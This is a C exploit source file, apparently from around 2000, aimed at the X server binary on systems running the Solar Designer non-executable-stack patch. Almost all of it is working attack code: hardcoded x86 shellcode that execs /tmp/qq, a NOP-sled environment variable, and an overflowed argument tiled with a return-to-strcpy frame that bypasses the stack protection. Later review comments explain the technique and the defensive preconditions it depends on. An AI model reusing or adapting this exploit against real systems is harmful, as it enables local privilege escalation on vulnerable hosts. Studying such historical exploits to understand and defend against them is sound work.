/*
** Exploit no 1 for Solar Designer patch
** by nergal@icm.edu.pl
** This code is meant for educational and entertaining purposes only.
** You can distribute it freely provided credits are given.
**
*/
#include <stdio.h>
/* change the following 0 if the code doesn't work */
#define OFFSET 0
#define BUFFER_SIZE 370
#define EGG_SIZE 2048
#define NOP 0x90
/* any address in data segment */
#define DEST 0x08223038
/* strcpy linkage table entry */
#define STRCPY 0x08066a18
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/qq";
char buf[BUFFER_SIZE];
char egg[EGG_SIZE];
char pattern[16];
/*
 * Builds an overlong argument string and a payload-carrying environment
 * variable, then executes /usr/X11R6/bin/X with them.
 *
 * argv[1] (optional) overrides the byte offset at which the repeated pattern
 * starts inside buf. On success execl() replaces the process and nothing
 * below it runs; on failure the execl error is printed.
 *
 * NOTE(review): the following reading is inferred from the pattern layout
 * and the file header ("for Solar Designer patch"), not stated on the page.
 * The four words look like a call frame for strcpy: a saved return address
 * pointing at the strcpy linkage-table entry, then the address strcpy would
 * return to (DEST), then its destination (DEST) and source (src) arguments.
 * That shape avoids running code from the stack directly, which is what a
 * non-executable-stack patch prevents.
 *
 * NOTE(review): from a defender's side, the construction relies on fixed,
 * predictable addresses for the image and the stack, on a data region that
 * is both writable and executable, and on an unchecked copy of the long
 * argument in the target. It also only matters if the target runs with more
 * privilege than the caller (e.g. set-uid); the page does not say so.
 */
void main(int argc, char **argv)
{
/* try alignment in 3..18; three worked for me */
int i, align = 3;
/*
 * The address of this local is used as an estimate of a stack address;
 * the cast to int assumes pointers fit in 32 bits.
 */
int src = (int) &src - OFFSET; /* formerly known as get_sp() :) */
if (argc == 2)
align = atoi(argv[1]);
/* fill the 16-byte pattern with four 32-bit words (see header comment) */
*(int *) pattern = STRCPY;
*(int *) (pattern + 4) = DEST;
*(int *) (pattern + 8) = DEST;
*(int *) (pattern + 12) = src;
/*
 * buf is passed as a C string, so a zero byte anywhere in the pattern
 * would end the argument early; abort in that case.
 */
for (i = 0; i <= 15; i++)
if (pattern[i] == 0)
{
printf("zero in pattern (%i)\n", i);
exit(1);
}
/* space-filled, NUL-terminated argument that begins with ":9" */
/* NOTE(review): ":9" looks like an X display name -- confirm */
memset(buf, ' ', BUFFER_SIZE);
buf[BUFFER_SIZE - 1] = 0;
buf[0] = ':';
buf[1] = '9';
/* tile the pattern every 16 bytes from offset align to the end of buf */
for (i = align; i < BUFFER_SIZE - 16; i += 16)
memcpy(buf + i, pattern, 16);
/*
 * Environment string: NOP fill, the payload copied so that its
 * terminating NUL lands at egg[EGG_SIZE - 2], then the first four bytes
 * overwritten with "EGG=" (strncpy with n == 4 writes no terminator here).
 */
memset(egg, NOP, EGG_SIZE);
strcpy(egg + EGG_SIZE - strlen(shellcode) - 2, shellcode);
strncpy(egg, "EGG=", 4);
putenv(egg);
/* run the target with the crafted string as its first argument */
execl("/usr/X11R6/bin/X", "X", buf, "-nolock", 0);
/* reached only if execl() failed */
perror("execl");
}
/* www.hack.co.za [2000]*/